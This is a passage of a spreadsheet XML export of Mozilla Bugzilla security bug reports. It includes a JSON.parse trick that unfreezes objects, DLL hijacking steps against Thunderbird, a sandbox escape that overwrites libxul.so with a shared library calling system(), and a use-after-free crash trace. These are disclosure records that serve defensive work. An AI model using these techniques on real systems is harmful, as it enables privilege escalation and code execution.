          <t>2019-03-11 07:52:03 -0700</t>
        </is>
      </c>
      <c r="E5364" t="n">
        <v>1</v>
      </c>
      <c r="F5364" t="n">
        <v>1</v>
      </c>
      <c r="G5364" t="n">
        <v>3</v>
      </c>
      <c r="H5364" t="inlineStr">
        <is>
          <t>Components</t>
        </is>
      </c>
      <c r="I5364" t="inlineStr">
        <is>
          <t>Core</t>
        </is>
      </c>
      <c r="J5364" t="inlineStr">
        <is>
          <t>JavaScript Engine</t>
        </is>
      </c>
      <c r="K5364" t="inlineStr">
        <is>
          <t>unspecified</t>
        </is>
      </c>
      <c r="L5364" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="M5364" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="N5364" t="inlineStr">
        <is>
          <t>VERIFIED</t>
        </is>
      </c>
      <c r="O5364" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P5364" t="inlineStr">
        <is>
          <t>[fixed by bug 1125624][adv-main41+]</t>
        </is>
      </c>
      <c r="Q5364" t="inlineStr">
        <is>
          <t>--</t>
        </is>
      </c>
      <c r="R5364" t="inlineStr">
        <is>
          <t>normal</t>
        </is>
      </c>
      <c r="S5364" t="inlineStr">
        <is>
          <t>---</t>
        </is>
      </c>
      <c r="T5364" t="n">
        <v>1</v>
      </c>
      <c r="U5364" t="n">
        <v>0</v>
      </c>
      <c r="V5364" t="n">
        <v>23</v>
      </c>
      <c r="W5364" t="inlineStr">
        <is>
          <t>Every API that enforces that a non-configurable property can't be reconfigured (except in its writability, and except in value if it's writable), does so with one-off logic specific to that particular API.  Anything that doesn't go through there -- including the JSObject::define{Property,Element,Generic} funnels, can violate the property invariants.  This Is Bad.
Bug 901351 comment 14 provides one example of how this results in badness -- in this case, of a "frozen" object being "unfrozen" such that immutable properties become mutable, &amp;c.:
    function thaw(obj) {
        var done = true;
        JSON.parse("[0, 1]", function (k, v) {
            if (this !== obj &amp;&amp; k !== "" &amp;&amp; done) {
                done = false;
                this[1 - k] = obj;
            }
            return v;
        });
    }
    var obj = Object.freeze({a: 1, b: 2, c: 3});
    obj.a = false;  // does nothing, obj.a is non-writable
    assertEq(obj.a, 1);
    thaw(obj);  // bug: the properties become writable, which shouldn't be possible
    obj.a = false;
    assertEq(obj.a, 1);  // FAILS, obj.a is now false
The internal Walk algorithm (after bug 901351, at least) uses JSObject::defineGeneric, which blithely modifies/overwrites non-configurable properties.  This instance allows improper redefinition of pretty much any user-controllable, enumerable, non-configurable property.  (It won't always work, but it's hard to describe the exceptions.  But usually, if the object isn't too weird, you could use JSON.parse to violate an arbitrarily-chosen property's invariants.)  I don't know if other places perform JSObject.define{Property,Generic,Element} so user-controllably, but there's probably at least one other place somewhere that does so.</t>
        </is>
      </c>
      <c r="X5364" t="n">
        <v>1</v>
      </c>
    </row>
    <row r="5365">
      <c r="A5365" t="n">
        <v>82497</v>
      </c>
      <c r="B5365" t="inlineStr">
        <is>
          <t>2001-05-23 20:11:35 -0700</t>
        </is>
      </c>
      <c r="C5365" t="inlineStr">
        <is>
          <t>Stranded Params</t>
        </is>
      </c>
      <c r="D5365" t="inlineStr">
        <is>
          <t>2012-12-18 20:46:24 -0800</t>
        </is>
      </c>
      <c r="E5365" t="n">
        <v>1</v>
      </c>
      <c r="F5365" t="n">
        <v>1</v>
      </c>
      <c r="G5365" t="n">
        <v>4</v>
      </c>
      <c r="H5365" t="inlineStr">
        <is>
          <t>Server Software</t>
        </is>
      </c>
      <c r="I5365" t="inlineStr">
        <is>
          <t>Bugzilla</t>
        </is>
      </c>
      <c r="J5365" t="inlineStr">
        <is>
          <t>Bugzilla-General</t>
        </is>
      </c>
      <c r="K5365" t="inlineStr">
        <is>
          <t>2.12</t>
        </is>
      </c>
      <c r="L5365" t="inlineStr">
        <is>
          <t>x86</t>
        </is>
      </c>
      <c r="M5365" t="inlineStr">
        <is>
          <t>Linux</t>
        </is>
      </c>
      <c r="N5365" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O5365" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P5365" t="inlineStr"/>
      <c r="Q5365" t="inlineStr">
        <is>
          <t>P4</t>
        </is>
      </c>
      <c r="R5365" t="inlineStr">
        <is>
          <t>trivial</t>
        </is>
      </c>
      <c r="S5365" t="inlineStr">
        <is>
          <t>Bugzilla 2.16</t>
        </is>
      </c>
      <c r="T5365" t="n">
        <v>1</v>
      </c>
      <c r="U5365" t="n">
        <v>0</v>
      </c>
      <c r="V5365" t="n">
        <v>18</v>
      </c>
      <c r="W5365" t="inlineStr">
        <is>
          <t>In the course of fixing bug 71552 it came up that when a Param is removed from
defparam.pl it never gets removed from data/params.  While this shouldn't cause
an problems, it is extra and unneeded stuff floating around.  There should be a
routine in checksetup.pl that can remove those.  Right now the params the need
removing are:
 * newemailtech
 * newemailtechdefault
 * changedmail
 * prettyasciimail
Attachment 33631 has the routines that would need to be added to checksetup.pl.
 There was a question on IRC how requiring defparams.pl would react w/out having
globals.pl for the SendSQL routine (even though SendSQL is inside a sub that
isn't called by WriteParams).</t>
        </is>
      </c>
      <c r="X5365" t="n">
        <v>0</v>
      </c>
    </row>
    <row r="5366">
      <c r="A5366" t="n">
        <v>1682101</v>
      </c>
      <c r="B5366" t="inlineStr">
        <is>
          <t>2020-12-12 01:12:58 -0800</t>
        </is>
      </c>
      <c r="C5366" t="inlineStr">
        <is>
          <t>Thunderbird may use OTR library using a filename that isn't distributed</t>
        </is>
      </c>
      <c r="D5366" t="inlineStr">
        <is>
          <t>2022-04-14 01:08:33 -0700</t>
        </is>
      </c>
      <c r="E5366" t="n">
        <v>1</v>
      </c>
      <c r="F5366" t="n">
        <v>1</v>
      </c>
      <c r="G5366" t="n">
        <v>2</v>
      </c>
      <c r="H5366" t="inlineStr">
        <is>
          <t>Client Software</t>
        </is>
      </c>
      <c r="I5366" t="inlineStr">
        <is>
          <t>Thunderbird</t>
        </is>
      </c>
      <c r="J5366" t="inlineStr">
        <is>
          <t>Security</t>
        </is>
      </c>
      <c r="K5366" t="inlineStr">
        <is>
          <t>78</t>
        </is>
      </c>
      <c r="L5366" t="inlineStr">
        <is>
          <t>Unspecified</t>
        </is>
      </c>
      <c r="M5366" t="inlineStr">
        <is>
          <t>Unspecified</t>
        </is>
      </c>
      <c r="N5366" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O5366" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P5366" t="inlineStr"/>
      <c r="Q5366" t="inlineStr">
        <is>
          <t>--</t>
        </is>
      </c>
      <c r="R5366" t="inlineStr">
        <is>
          <t>--</t>
        </is>
      </c>
      <c r="S5366" t="inlineStr">
        <is>
          <t>89 Branch</t>
        </is>
      </c>
      <c r="T5366" t="n">
        <v>1</v>
      </c>
      <c r="U5366" t="n">
        <v>0</v>
      </c>
      <c r="V5366" t="n">
        <v>70</v>
      </c>
      <c r="W5366" t="inlineStr">
        <is>
          <t>User Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/87.0.4280.88 Safari/537.36
Steps to reproduce:
1. Summary:
The newest version of Mozilla Thunderbird Product has 02 vulnerability about dll hijacking and lead attackers to perform an arbitrary code execution by loading a unverify dll.
- Vulnerability Process: thunderbird.exe (Local at : "%Program Files (x86)%\Mozilla Thunderbird\thunderbird.exe")
- The dll name Hijacked: otr-5.dll, otr.5.dll
2. Steps To Reproduce:
When user runs thunderbird.exe 02libraries with name otr-5.dll and otr.5.dll at 1.Summary are loaded by thunderbird.exe with a relative name that makes it exposed to DLL hijacking. When an application or a service is starting on Windows it looks for the used DLLs in order to function properly. If these DLLs don’t exist or the software code is developed in an insecure way (DLL’s are called without using a fully qualified path) then it’s possible to load and execute a malicious DLL file.
It should be noted that when an application needs to load a DLL it will go through the following order:
The directory from which the application is loaded
C:\Windows\System32
C:\Windows\System
C:\Windows
The current working directory
Directories in the system PATH environment variable
3. These steps below will show how to escalate privilege:
- Create a fake dll with name "otr-5.dll". Its code just calls the notepad.exe process by cmd.exe. (with user - not admin)
- Copy the fake dll "otr-5.dll" to a folder which has writeable permission with user. I choose folder "C:\Python27" (It is contained in "Directories in the system PATH environment variable")
- Open thunderbird.exe, my fake otr-5.dll is called first, and the notepad.exe process runs.
Actual results:
Attacker can run all malicious commands on victim computer with this issue whenever user opens thunderbird.exe.
Expected results:
Thunderbird.exe should load the truth dlls with verified digital on the truth path.</t>
        </is>
      </c>
      <c r="X5366" t="n">
        <v>1</v>
      </c>
    </row>
    <row r="5367">
      <c r="A5367" t="n">
        <v>1344415</v>
      </c>
      <c r="B5367" t="inlineStr">
        <is>
          <t>2017-03-03 17:08:59 -0800</t>
        </is>
      </c>
      <c r="C5367" t="inlineStr">
        <is>
          <t>Privilege escalation/Sandbox escape using PFileSystemRequestConstructor</t>
        </is>
      </c>
      <c r="D5367" t="inlineStr">
        <is>
          <t>2021-10-20 13:41:27 -0700</t>
        </is>
      </c>
      <c r="E5367" t="n">
        <v>1</v>
      </c>
      <c r="F5367" t="n">
        <v>1</v>
      </c>
      <c r="G5367" t="n">
        <v>3</v>
      </c>
      <c r="H5367" t="inlineStr">
        <is>
          <t>Components</t>
        </is>
      </c>
      <c r="I5367" t="inlineStr">
        <is>
          <t>Core</t>
        </is>
      </c>
      <c r="J5367" t="inlineStr">
        <is>
          <t>Security: Process Sandboxing</t>
        </is>
      </c>
      <c r="K5367" t="inlineStr">
        <is>
          <t>unspecified</t>
        </is>
      </c>
      <c r="L5367" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="M5367" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="N5367" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O5367" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P5367" t="inlineStr">
        <is>
          <t>[sb?][adv-main53+][adv-esr52.1+]</t>
        </is>
      </c>
      <c r="Q5367" t="inlineStr">
        <is>
          <t>--</t>
        </is>
      </c>
      <c r="R5367" t="inlineStr">
        <is>
          <t>normal</t>
        </is>
      </c>
      <c r="S5367" t="inlineStr">
        <is>
          <t>mozilla55</t>
        </is>
      </c>
      <c r="T5367" t="n">
        <v>1</v>
      </c>
      <c r="U5367" t="n">
        <v>0</v>
      </c>
      <c r="V5367" t="n">
        <v>51</v>
      </c>
      <c r="W5367" t="inlineStr">
        <is>
          <t>Created attachment 8843522
DO NOT COMMIT - PoC code for demonstrating priv esc
Since we are in the process of rolling out a sandbox for each platform, it is not only important to make it as tight as possible but also make sure that we don't have any unintended behavior that would allow to bypass the sandbox restrictions.
IPC is probably going to be the first point of attack when trying to escalate from a compromised content process.
Vulnerable Part
====================
I took a look at one particular IPC message from the PBackground protocol, called PFileSystemRequest [1] due to its name.
The argument for that message is defined as follows:
&gt; union FileSystemParams
&gt; {
&gt;   FileSystemCreateDirectoryParams;
&gt;   FileSystemCreateFileParams;
&gt;   FileSystemGetDirectoryListingParams;
&gt;   FileSystemGetFilesParams;
&gt;   FileSystemGetFileOrDirectoryParams;
&gt;   FileSystemRemoveParams;
&gt; };
Now looking at that protocol in more detail, it is basically possible to bypass all of our file system restrictions implemented in our sandbox (no matter the platform), currently write access to the file system is restricted on the latest Linux nightly build. However, given a compromised content process, this restriction can be bypassed using the above mentioned message.
I looked at one request in particular namely FileSystemCreateFileParams.
Now there are some security checks performed on the parent side, but only for devicestorage access.
However, the critical part here is that no security checks whatsoever are performed for native file system access.
I.e. if the compromised child supplies a path like "/home/&lt;user&gt;/.bashrc" as part of FileSystemCreateFileParam, it can write whatever it likes into that file, since the file content to be written is supplied with that message as well.
The API is powerful enough to even allow overwriting existing files...
This functions [2] checks the path coming from the child, if it doesn't start with "devicestorage-" a OSFileSystemParent object is created and returned, and as part of the constructor, a member variable is set which gives unrestricted access [3].
Furthermore, a last check before any operation is performed on the file path coming from the child here [4] leads to a simple 'return true' here [5]. Thus allowing any file to be overwritten/created as long as the user that is running Firefox has access.
This in itself is already a problem and ideally this message should be removed entirely, or at least get a whitelist restriction on the parent side.
Privilege Escalation
====================
Since I wanted to see if it is possible to gain code execution, I decided to get a PoC that would allow me to run arbitrary code with the parent privileges. Attached is a patch that allows to trigger the PoC, following some simple steps.
1. Compile Firefox with the patch applied
2. Run firefox and open some website (e.g. google.com)
3. Open the web console (Tools -&gt; Web Developer -&gt; Web Console)
4. Run inside the web console: window.Directory.triggerIPC("&lt;path to file you want to create/overwrite&gt;");
When calling triggerIPC(), the PFileSystemRequest message will be sent accross the channel to the parent, the targeted file is specified as the first argument. The content of the file is an ELF shared library that declares a constructor:
&gt; #include &lt;stdlib.h&gt;
&gt; 
&gt; __attribute__((constructor)) static void constr(void)
&gt; {
&gt;   unsetenv("LD_PRELOAD");
&gt;   unsetenv("LD_LIBRARY_PATH");
&gt;   system("id");
&gt; }
I decided to overwrite one of the libraries that are shipped with Firefox (libxul.so) because the parent process is probably allowed to write in that directory where those files reside and given a compromised content process, figuring out where the Firefox root directory is located is a trivial task. So as a path I supplied: 
&gt; "/home/tedd/projects/build-dev/toolkit/library/libxul.so"
This overwrites the existing libxul.so and the next time Firefox is started, it will load that library, and as part of the initialization, the libraries constructor function is executed.
For test purpose, I execute 'id'. Firefox will not be able to start, but you will see the output of 'id' on your terminal.
I decided to go with a Firefox library because it is probably the most reliable way, but there may be other more clever ways to do it.
[1] http://searchfox.org/mozilla-central/rev/9bbb2bd7c715d9a76e0a0bde043dad41021ea7c9/ipc/glue/PBackground.ipdl#105
[2] http://searchfox.org/mozilla-central/rev/9bbb2bd7c715d9a76e0a0bde043dad41021ea7c9/dom/filesystem/FileSystemBase.cpp#18
[3] http://searchfox.org/mozilla-central/rev/9bbb2bd7c715d9a76e0a0bde043dad41021ea7c9/dom/filesystem/OSFileSystem.cpp#115
[4] http://searchfox.org/mozilla-central/rev/546a05fec017cb785fca62a5199d42812a6a1fd3/dom/filesystem/CreateFileTask.cpp#271
[5] http://searchfox.org/mozilla-central/rev/9bbb2bd7c715d9a76e0a0bde043dad41021ea7c9/dom/filesystem/OSFileSystem.h#94</t>
        </is>
      </c>
      <c r="X5367" t="n">
        <v>1</v>
      </c>
    </row>
    <row r="5368">
      <c r="A5368" t="n">
        <v>439034</v>
      </c>
      <c r="B5368" t="inlineStr">
        <is>
          <t>2008-06-13 01:50:24 -0700</t>
        </is>
      </c>
      <c r="C5368" t="inlineStr">
        <is>
          <t>Same-origin check in nsXMLDocument::OnChannelRedirect() can be circumvented</t>
        </is>
      </c>
      <c r="D5368" t="inlineStr">
        <is>
          <t>2008-11-16 20:43:44 -0800</t>
        </is>
      </c>
      <c r="E5368" t="n">
        <v>1</v>
      </c>
      <c r="F5368" t="n">
        <v>1</v>
      </c>
      <c r="G5368" t="n">
        <v>3</v>
      </c>
      <c r="H5368" t="inlineStr">
        <is>
          <t>Components</t>
        </is>
      </c>
      <c r="I5368" t="inlineStr">
        <is>
          <t>Core</t>
        </is>
      </c>
      <c r="J5368" t="inlineStr">
        <is>
          <t>Security</t>
        </is>
      </c>
      <c r="K5368" t="inlineStr">
        <is>
          <t>1.8 Branch</t>
        </is>
      </c>
      <c r="L5368" t="inlineStr">
        <is>
          <t>x86</t>
        </is>
      </c>
      <c r="M5368" t="inlineStr">
        <is>
          <t>Windows XP</t>
        </is>
      </c>
      <c r="N5368" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O5368" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P5368" t="inlineStr">
        <is>
          <t>[sg:high xss]</t>
        </is>
      </c>
      <c r="Q5368" t="inlineStr">
        <is>
          <t>--</t>
        </is>
      </c>
      <c r="R5368" t="inlineStr">
        <is>
          <t>normal</t>
        </is>
      </c>
      <c r="S5368" t="inlineStr">
        <is>
          <t>---</t>
        </is>
      </c>
      <c r="T5368" t="n">
        <v>1</v>
      </c>
      <c r="U5368" t="n">
        <v>0</v>
      </c>
      <c r="V5368" t="n">
        <v>15</v>
      </c>
      <c r="W5368" t="inlineStr">
        <is>
          <t>This is fx2-only.  (On trunk, the same-origin check in question compares an old
URI to a new URI.)
The same-origin check in nsXMLDocument::OnChannelRedirect() uses a principal of
an associated JS context.  It can be circumvented by loading a cross-origin
page in that context before nsXMLDocument::OnChannelRedirect() is called.
By using this trick, it's possible to change a principal of an XML document,
and thus, an attacker can perform an XSS attack.
Upcoming testcase consists of an html and a cgi script, thus it does not work
on bugzilla.mozilla.org.  Please set up it in a suitable place.</t>
        </is>
      </c>
      <c r="X5368" t="n">
        <v>1</v>
      </c>
    </row>
    <row r="5369">
      <c r="A5369" t="n">
        <v>1745874</v>
      </c>
      <c r="B5369" t="inlineStr">
        <is>
          <t>2021-12-13 21:39:29 -0800</t>
        </is>
      </c>
      <c r="C5369" t="inlineStr">
        <is>
          <t>Use-after-free of AudioSink::NotifyAudioNeeded</t>
        </is>
      </c>
      <c r="D5369" t="inlineStr">
        <is>
          <t>2024-05-30 10:52:11 -0700</t>
        </is>
      </c>
      <c r="E5369" t="n">
        <v>1</v>
      </c>
      <c r="F5369" t="n">
        <v>1</v>
      </c>
      <c r="G5369" t="n">
        <v>3</v>
      </c>
      <c r="H5369" t="inlineStr">
        <is>
          <t>Components</t>
        </is>
      </c>
      <c r="I5369" t="inlineStr">
        <is>
          <t>Core</t>
        </is>
      </c>
      <c r="J5369" t="inlineStr">
        <is>
          <t>Audio/Video</t>
        </is>
      </c>
      <c r="K5369" t="inlineStr">
        <is>
          <t>unspecified</t>
        </is>
      </c>
      <c r="L5369" t="inlineStr">
        <is>
          <t>Unspecified</t>
        </is>
      </c>
      <c r="M5369" t="inlineStr">
        <is>
          <t>Unspecified</t>
        </is>
      </c>
      <c r="N5369" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O5369" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P5369" t="inlineStr">
        <is>
          <t>[reporter-external] [client-bounty-form][adv-main96+][adv-ESR91.5+][sec-survey][post-critsmash-triage]</t>
        </is>
      </c>
      <c r="Q5369" t="inlineStr">
        <is>
          <t>P1</t>
        </is>
      </c>
      <c r="R5369" t="inlineStr">
        <is>
          <t>S3</t>
        </is>
      </c>
      <c r="S5369" t="inlineStr">
        <is>
          <t>97 Branch</t>
        </is>
      </c>
      <c r="T5369" t="n">
        <v>1</v>
      </c>
      <c r="U5369" t="n">
        <v>0</v>
      </c>
      <c r="V5369" t="n">
        <v>25</v>
      </c>
      <c r="W5369" t="inlineStr">
        <is>
          <t>Created attachment 9255182
poc.html
Tested Version: Ubuntu 64-bit memory 8G + linux64-fuzzing-asan-opt(95.0.1 (64-bit)) =&gt; linux64-fuzzing-asan-opt
Loading poc.html into the firefox browser to create a new tab(Using the grizzly tool(allow pop-ups)),This poc is not 100% stable, and I can only trigger it in the docker container,if it fails, please repeat more times. the crash report is as follows:
=================================================================
==40332==ERROR: AddressSanitizer: heap-use-after-free on address 0x6180000503f8 at pc 0x7f9161f84be0 bp 0x7f913ee81570 sp 0x7f913ee81568
READ of size 8 at 0x6180000503f8 thread T33 (MediaDe~hine #1)
    #0 0x7f9161f84bdf in mozilla::AudioSink::NotifyAudioNeeded() /builds/worker/checkouts/gecko/dom/media/mediasink/AudioSink.cpp:361:10
    #1 0x7f9161fa63af in operator() /builds/worker/workspace/obj-build/dist/include/MediaEventSource.h:404:7
    #2 0x7f9161fa63af in ApplyWithArgsImpl&lt;(lambda at /builds/worker/workspace/obj-build/dist/include/MediaEventSource.h:403:37)&gt; /builds/worker/workspace/obj-build/dist/include/MediaEventSource.h:214:5
    #3 0x7f9161fa63af in mozilla::detail::ListenerImpl&lt;mozilla::AbstractThread, std::enable_if&lt;TakeArgs&lt;void (mozilla::AudioSink::*)(RefPtr&lt;mozilla::AudioData&gt; const&amp;)&gt;::value, mozilla::MediaEventListener&gt;::type mozilla::MediaEventSourceImpl&lt;(mozilla::ListenerPolicy)1, RefPtr&lt;mozilla::AudioData&gt; &gt;::ConnectInternal&lt;mozilla::AbstractThread, mozilla::AudioSink, void (mozilla::AudioSink::*)(RefPtr&lt;mozilla::AudioData&gt; const&amp;)&gt;(mozilla::AbstractThread*, mozilla::AudioSink*, void (mozilla::AudioSink::*)(RefPtr&lt;mozilla::AudioData&gt; const&amp;))::'lambda'(RefPtr&lt;mozilla::AudioData&gt;&amp;&amp;), RefPtr&lt;mozilla::AudioData&gt; &gt;::ApplyWithArgs(RefPtr&lt;mozilla::AudioData&gt;&amp;&amp;) /builds/worker/workspace/obj-build/dist/include/MediaEventSource.h:236:5
    #4 0x7f9161b8caee in applyImpl&lt;mozilla::detail::Listener&lt;RefPtr&lt;mozilla::AudioData&gt; &gt;, void (mozilla::detail::Listener&lt;RefPtr&lt;mozilla::AudioData&gt; &gt;::*)(RefPtr&lt;mozilla::AudioData&gt; &amp;&amp;), StoreCopyPassByRRef&lt;RefPtr&lt;mozilla::AudioData&gt; &gt; , 0UL&gt; /builds/worker/workspace/obj-build/dist/include/nsThreadUtils.h:1147:12
    #5 0x7f9161b8caee in apply&lt;mozilla::detail::Listener&lt;RefPtr&lt;mozilla::AudioData&gt; &gt;, void (mozilla::detail::Listener&lt;RefPtr&lt;mozilla::AudioData&gt; &gt;::*)(RefPtr&lt;mozilla::AudioData&gt; &amp;&amp;)&gt; /builds/worker/workspace/obj-build/dist/include/nsThreadUtils.h:1153:12
    #6 0x7f9161b8caee in mozilla::detail::RunnableMethodImpl&lt;mozilla::detail::Listener&lt;RefPtr&lt;mozilla::AudioData&gt; &gt;*, void (mozilla::detail::Listener&lt;RefPtr&lt;mozilla::AudioData&gt; &gt;::*)(RefPtr&lt;mozilla::AudioData&gt;&amp;&amp;), true, (mozilla::RunnableKind)0, RefPtr&lt;mozilla::AudioData&gt;&amp;&amp;&gt;::Run() /builds/worker/workspace/obj-build/dist/include/nsThreadUtils.h:1200:13
    #7 0x7f915ba95b70 in mozilla::AutoTaskDispatcher::TaskGroupRunnable::Run() /builds/worker/workspace/obj-build/dist/include/mozilla/TaskDispatcher.h:227:35
    #8 0x7f915baa2f0d in mozilla::TaskQueue::Runner::Run() /builds/worker/checkouts/gecko/xpcom/threads/TaskQueue.cpp:208:20
    #9 0x7f915bacac3b in nsThreadPool::Run() /builds/worker/checkouts/gecko/xpcom/threads/nsThreadPool.cpp:305:14
    #10 0x7f915babd9f4 in nsThread::ProcessNextEvent(bool, bool*) /builds/worker/checkouts/gecko/xpcom/threads/nsThread.cpp:1169:16
    #11 0x7f915bac76ec in NS_ProcessNextEvent(nsIThread*, bool) /builds/worker/checkouts/gecko/xpcom/threads/nsThreadUtils.cpp:467:10
    #12 0x7f915cf4ee0d in mozilla::ipc::MessagePumpForNonMainThreads::Run(base::MessagePump::Delegate*) /builds/worker/checkouts/gecko/ipc/glue/MessagePump.cpp:300:20
    #13 0x7f915cdd91f1 in RunInternal /builds/worker/checkouts/gecko/ipc/chromium/src/base/message_loop.cc:331:10
    #14 0x7f915cdd91f1 in RunHandler /builds/worker/checkouts/gecko/ipc/chromium/src/base/message_loop.cc:324:3
    #15 0x7f915cdd91f1 in MessageLoop::Run() /builds/worker/checkouts/gecko/ipc/chromium/src/base/message_loop.cc:306:3
    #16 0x7f915bab6d7b in nsThread::ThreadFunc(void*) /builds/worker/checkouts/gecko/xpcom/threads/nsThread.cpp:391:10
    #17 0x7f917722a09e in _pt_root /builds/worker/checkouts/gecko/nsprpub/pr/src/pthreads/ptthread.c:201:5
    #18 0x7f9178b50608 in start_thread (/lib/x86_64-linux-gnu/libpthread.so.0+0x9608)
    #19 0x7f9178718292 in __clone (/lib/x86_64-linux-gnu/libc.so.6+0x122292)
0x6180000503f8 is located 888 bytes inside of 896-byte region [0x618000050080,0x618000050400)
freed by thread T33 (MediaDe~hine #1) here:
    #0 0x563dfcba4cb2 in __interceptor_free /builds/worker/fetches/llvm-project/llvm/projects/compiler-rt/lib/asan/asan_malloc_linux.cpp:111:3
    #1 0x7f9161f88e9e in operator() /builds/worker/workspace/obj-build/dist/include/mozilla/UniquePtr.h:463:5
    #2 0x7f9161f88e9e in reset /builds/worker/workspace/obj-build/dist/include/mozilla/UniquePtr.h:305:7
    #3 0x7f9161f88e9e in ~UniquePtr /builds/worker/workspace/obj-build/dist/include/mozilla/UniquePtr.h:253:18
    #4 0x7f9161f88e9e in mozilla::AudioSinkWrapper::~AudioSinkWrapper() /builds/worker/checkouts/gecko/dom/media/mediasink/AudioSinkWrapper.cpp:17:37
    #5 0x7f9161f88fdd in mozilla::AudioSinkWrapper::~AudioSinkWrapper() /builds/worker/checkouts/gecko/dom/media/mediasink/AudioSinkWrapper.cpp:17:37
    #6 0x7f915c92d09f in mozilla::MozPromise&lt;bool, nsresult, false&gt;::ThenValueBase::ResolveOrRejectRunnable::Run() /builds/worker/workspace/obj-build/dist/include/mozilla/MozPromise.h:487:21
    #7 0x7f915ba95b70 in mozilla::AutoTaskDispatcher::TaskGroupRunnable::Run() /builds/worker/workspace/obj-build/dist/include/mozilla/TaskDispatcher.h:227:35
    #8 0x7f915baa2f0d in mozilla::TaskQueue::Runner::Run() /builds/worker/checkouts/gecko/xpcom/threads/TaskQueue.cpp:208:20
    #9 0x7f915bacac3b in nsThreadPool::Run() /builds/worker/checkouts/gecko/xpcom/threads/nsThreadPool.cpp:305:14
    #10 0x7f915babd9f4 in nsThread::ProcessNextEvent(bool, bool*) /builds/worker/checkouts/gecko/xpcom/threads/nsThread.cpp:1169:16
    #11 0x7f915bac76ec in NS_ProcessNextEvent(nsIThread*, bool) /builds/worker/checkouts/gecko/xpcom/threads/nsThreadUtils.cpp:467:10
    #12 0x7f915cf4ee0d in mozilla::ipc::MessagePumpForNonMainThreads::Run(base::MessagePump::Delegate*) /builds/worker/checkouts/gecko/ipc/glue/MessagePump.cpp:300:20
    #13 0x7f915cdd91f1 in RunInternal /builds/worker/checkouts/gecko/ipc/chromium/src/base/message_loop.cc:331:10
    #14 0x7f915cdd91f1 in RunHandler /builds/worker/checkouts/gecko/ipc/chromium/src/base/message_loop.cc:324:3
    #15 0x7f915cdd91f1 in MessageLoop::Run() /builds/worker/checkouts/gecko/ipc/chromium/src/base/message_loop.cc:306:3
    #16 0x7f915bab6d7b in nsThread::ThreadFunc(void*) /builds/worker/checkouts/gecko/xpcom/threads/nsThread.cpp:391:10
    #17 0x7f917722a09e in _pt_root /builds/worker/checkouts/gecko/nsprpub/pr/src/pthreads/ptthread.c:201:5
    #18 0x7f9178b50608 in start_thread (/lib/x86_64-linux-gnu/libpthread.so.0+0x9608)
previously allocated by thread T33 (MediaDe~hine #1) here:
    #0 0x563dfcba4f1d in __interceptor_malloc /builds/worker/fetches/llvm-project/llvm/projects/compiler-rt/lib/asan/asan_malloc_linux.cpp:129:3
    #1 0x563dfcbdfb8d in moz_xmalloc /builds/worker/checkouts/gecko/memory/mozalloc/mozalloc.cpp:52:15
    #2 0x7f9161bc2a7d in operator new /builds/worker/workspace/obj-build/dist/include/mozilla/cxxalloc.h:33:10
    #3 0x7f9161bc2a7d in operator() /builds/worker/checkouts/gecko/dom/media/MediaDecoderStateMachine.cpp:2871:9
    #4 0x7f9161bc2a7d in mozilla::AudioSinkWrapper::CreatorImpl&lt;mozilla::MediaDecoderStateMachine::CreateAudioSink()::$_31&gt;::Create(mozilla::media::TimeUnit const&amp;) /builds/worker/checkouts/gecko/dom/media/mediasink/AudioSinkWrapper.h:42:14
    #5 0x7f9161f89bd2 in mozilla::AudioSinkWrapper::Start(mozilla::media::TimeUnit const&amp;, mozilla::MediaInfo const&amp;) /builds/worker/checkouts/gecko/dom/media/mediasink/AudioSinkWrapper.cpp:174:30
    #6 0x7f9161f9b01f in mozilla::VideoSink::Start(mozilla::media::TimeUnit const&amp;, mozilla::MediaInfo const&amp;) /builds/worker/checkouts/gecko/dom/media/mediasink/VideoSink.cpp:219:29
    #7 0x7f9161a322be in mozilla::MediaDecoderStateMachine::StartMediaSink() /builds/worker/checkouts/gecko/dom/media/MediaDecoderStateMachine.cpp:3460:29
    #8 0x7f9161a1c504 in mozilla::MediaDecoderStateMachine::MaybeStartPlayback() /builds/worker/checkouts/gecko/dom/media/MediaDecoderStateMachine.cpp:3052:3
    #9 0x7f9161a3a864 in mozilla::MediaDecoderStateMachine::ResumeMediaSink() /builds/worker/checkouts/gecko/dom/media/MediaDecoderStateMachine.cpp:3930:3
    #10 0x7f9161bdcedd in applyImpl&lt;mozilla::MediaDecoderStateMachine, void (mozilla::MediaDecoderStateMachine::*)()&gt; /builds/worker/workspace/obj-build/dist/include/nsThreadUtils.h:1147:12
    #11 0x7f9161bdcedd in apply&lt;mozilla::MediaDecoderStateMachine, void (mozilla::MediaDecoderStateMachine::*)()&gt; /builds/worker/workspace/obj-build/dist/include/nsThreadUtils.h:1153:12
    #12 0x7f9161bdcedd in mozilla::detail::RunnableMethodImpl&lt;mozilla::MediaDecoderStateMachine*, void (mozilla::MediaDecoderStateMachine::*)(), true, (mozilla::RunnableKind)0&gt;::Run() /builds/worker/workspace/obj-build/dist/include/nsThreadUtils.h:1200:13
    #13 0x7f915ba95b70 in mozilla::AutoTaskDispatcher::TaskGroupRunnable::Run() /builds/worker/workspace/obj-build/dist/include/mozilla/TaskDispatcher.h:227:35
    #14 0x7f915baa2f0d in mozilla::TaskQueue::Runner::Run() /builds/worker/checkouts/gecko/xpcom/threads/TaskQueue.cpp:208:20
